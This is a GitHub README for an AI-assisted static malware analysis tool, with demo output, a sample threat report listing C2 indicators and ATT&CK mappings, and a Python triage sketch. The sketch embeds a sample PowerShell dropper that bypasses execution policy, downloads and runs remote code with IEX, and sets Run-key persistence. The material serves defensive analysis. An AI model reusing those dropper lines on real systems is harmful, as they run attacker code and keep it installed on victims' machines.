mataleon/AI-MALWARE-ANALYSIS-SANDBOX

GitHub: mataleon/AI-MALWARE-ANALYSIS-SANDBOX

# AI Malware Analysis Sandbox 🔬

> Drop a suspicious file — AI performs static analysis, maps capabilities to MITRE ATT&CK, and generates a professional threat report

An AI-powered static malware analysis tool that extracts strings, suspicious API calls, IOCs, and PE headers from suspicious files — then uses Claude AI to classify the malware, map every capability to MITRE ATT&CK, and produce a detailed analyst-grade report.

Files are never executed. Static analysis only.

MALWARE — 94/100 — High confidence on first run.

## What It Does

- Static analysis — entropy, strings, suspicious APIs, IOC extraction
- PE header analysis — imports, sections, packing detection for .exe / .dll
- AI classification — malware family, category, threat level
- MITRE ATT&CK mapping — every capability mapped to specific technique IDs
- IOC extraction — IPs, domains, URLs, registry keys, base64 blobs
- Professional reports — dark-theme HTML + Markdown with threat score bar

## Demo

```
# AI MALWARE ANALYSIS SANDBOX
Static Analysis · Powered by Claude AI
⚠️ Static analysis only — files are never executed

Using built-in malware sample (PowerShell dropper)...

[1/3] Performing static analysis...
File : svchost_helper.ps1
Type : Text/Script
Size : 1,477 bytes
Entropy : 5.536 / 8.0
Static score : 54 / 100
Suspicious APIs : 1
Suspicious strings : 11
IOCs: 1 IPs, 1 domains, 2 URLs

[2/3] Running AI analysis...
Analysis complete

[3/3] Saving reports...
Report saved : reports/malware_report_20260525_181436.md
HTML report : reports/malware_report_20260525_181436.html

──────────────────────────────────────────────────
VERDICT : MALWARE
AI SCORE : 94/100
STATIC SCORE : 54/100
CONFIDENCE : High
──────────────────────────────────────────────────
```

## Sample Analysis Output

From the built-in PowerShell dropper sample (svchost_helper.ps1):

```
## EXECUTIVE SUMMARY
This is a malicious PowerShell-based downloader/backdoor masquerading as a
legitimate Windows system file. The script establishes persistence via registry
Run keys, downloads and executes payloads from remote C2 servers, and employs
multiple evasion techniques including execution policy bypass and hidden window
execution. Dual C2 infrastructure and base64 obfuscation indicate a
sophisticated multi-stage attack designed for long-term compromise.

## MALWARE CLASSIFICATION
- Family : Backdoor/Downloader (hybrid)
- Category : Commodity malware with professional-grade evasion
- Threat Level: Critical

## MITRE ATT&CK MAPPING
T1547.001 — Registry Run Keys / Startup Folder (persistence via CurrentVersion\Run)
T1059.001 — PowerShell (script-based execution)
T1027 — Obfuscated Files or Information (base64 encoding)
T1140 — Deobfuscate/Decode Files or Information (FromBase64String + IEX)
T1497 — Virtualization/Sandbox Evasion (VMware/VirtualBox detection)
T1071.001 — Application Layer Protocol: Web (HTTP C2 via WebClient)
T1105 — Ingress Tool Transfer (DownloadString for payload staging)
T1036 — Masquerading (svchost_helper.ps1 mimics legitimate process)

## EXTRACTED IOCs
- IP : 185.220.101.48
- Domain : malware-c2.xyz
- URL : http://185.220.101.48/beacon
- URL : http://malware-c2.xyz/update
- Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
```

## Project Structure

```
ai-malware-sandbox/
├── main.py              # Entry point — orchestrates full pipeline
├── file_analyzer.py     # Static analysis engine
├── malware_analyst.py   # Claude AI analysis + MITRE mapping
├── report_generator.py  # Dark-theme HTML + Markdown reports
└── reports/             # Generated analysis reports (auto-created)
```

## Setup

1. Clone the repo

```bash
git clone https://github.com/yourusername/ai-malware-sandbox
cd ai-malware-sandbox
```

2. Install dependencies

```bash
pip install anthropic python-dotenv pefile
```

pefile enables deep PE header analysis for Windows executables. All other formats work without it.

3. Set your API key

```powershell
# Windows PowerShell
$env:ANTHROPIC_API_KEY = "your-key-here"
```

4. Run

```bash
# Test with built-in PowerShell dropper sample
python main.py --sample

# Analyse a real file
python main.py suspicious.exe
python main.py malware.ps1
python main.py dropper.js
```

## Supported File Types

| Type | Extension | Analysis |
|------|-----------|----------|
| Windows PE | .exe .dll | Full PE headers, imports, sections, packing |
| PowerShell | .ps1 | String extraction, API detection, IOCs |
| JavaScript | .js | Obfuscation detection, network IOCs |
| VBScript | .vbs | Suspicious string analysis |
| Python | .py | API and network indicator extraction |
| Batch | .bat | Command and persistence detection |
| Shell | .sh | Linux persistence and network indicators |
| Text | .txt | Generic string and IOC extraction |

## What the Static Analyzer Detects

| Category | Indicators |
|----------|------------|
| Process Injection | VirtualAlloc, WriteProcessMemory, CreateRemoteThread |
| Persistence | Registry Run keys, scheduled tasks, services |
| Evasion | IsDebuggerPresent, VM detection, Sleep, packing |
| Network C2 | WebClient, WinHTTP, raw socket APIs |
| Credential Access | LSA APIs, SAM database access, CryptDecrypt |
| Discovery | EnumProcesses, CreateToolhelp32Snapshot |
| Execution | ShellExecute, CreateProcess, LoadLibrary |
| Obfuscation | Base64 blobs, encoded payloads, IEX patterns |

## Environment Variables

| Variable | Required | Description |
|----------|----------|-------------|
| ANTHROPIC_API_KEY | ✅ Yes | Your Anthropic API key |

## Part of a Larger Portfolio

This is Project 4 in an end-to-end AI cybersecurity portfolio:

| # | Project | Headline |
|---|---------|----------|
| 1 | AI SOC Analyst | Live Sentinel integration |
| 2 | LLM Injection Defender | 17/17 attacks detected |
| 3 | AI Phishing Detector | 97% phishing probability |
| 4 | AI Malware Analysis Sandbox | MALWARE — 94/100 — High |

## The Full Story

Every project in this portfolio builds on real infrastructure:

- Honeypot deployed — 200,000+ real attacks collected
- Active Directory lab built — enterprise environment simulated
- Microsoft Sentinel configured — custom KQL detection rules
- AI SOC Analyst — automated Tier 1 investigation
- LLM Injection Defender — protects AI tools from being hijacked
- AI Phishing Detector — email threat analysis + IOC extraction
- This sandbox — static malware analysis + MITRE mapping
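
The static pass listed under What It Does (entropy on the 0 to 8 scale, IOC extraction, ATT&CK mapping) can be sketched as follows. This is an added example, not the project's code: `triage`, `ATTACK_RULES` and the sample script are assumptions made for illustration, and only the technique IDs come from the sample report above. Domains are taken from URL hosts because a bare-domain regex also matches .NET member access such as `Net.WebClient`.

```python
import ipaddress
import math
import re
from collections import Counter
from urllib.parse import urlsplit

# Constructed sample (documentation-range IP, reserved .example domain); not from the page.
SAMPLE = r'''
powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File svchost_helper.ps1
$wc = New-Object Net.WebClient
IEX $wc.DownloadString("http://203.0.113.7/beacon")
IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($b)))
Set-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name upd -Value $p
$alt = "http://c2.test-domain.example/update"
'''

URL_RE = re.compile(r'https?://[^\s"\'<>)]+', re.I)
IP_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')
NAIVE_DOMAIN_RE = re.compile(r'\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b', re.I)  # shown for contrast only
ATTACK_RULES = {  # hypothetical rule table; IDs are those in the README's sample report
    "T1547.001": r'CurrentVersion\\Run\b', "T1059.001": r'\bpowershell\b',
    "T1140": r'FromBase64String', "T1105": r'DownloadString', "T1071.001": r'WebClient',
}

def shannon_entropy(data: bytes) -> float:  # bits per byte: 0.0 constant, 8.0 uniform
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0

def valid_ip(s: str) -> bool:
    try:
        ipaddress.ip_address(s)  # rejects octets above 255
        return True
    except ValueError:
        return False

def triage(text: str) -> dict:
    urls = sorted(set(URL_RE.findall(text)))
    ips = sorted({s for s in IP_RE.findall(text) if valid_ip(s)})
    # Domains come from URL hosts only: NAIVE_DOMAIN_RE would also report
    # Net.WebClient, Text.Encoding and similar member access as domains.
    domains = sorted({h for u in urls if (h := urlsplit(u).hostname) and not valid_ip(h)})
    return {
        "entropy": round(shannon_entropy(text.encode()), 3),
        "ips": ips, "domains": domains, "urls": urls,
        "techniques": [t for t, rx in ATTACK_RULES.items() if re.search(rx, text, re.I)],
    }

if __name__ == "__main__":
    print(triage(SAMPLE))
```

The input is only read as text; nothing in it is executed or fetched.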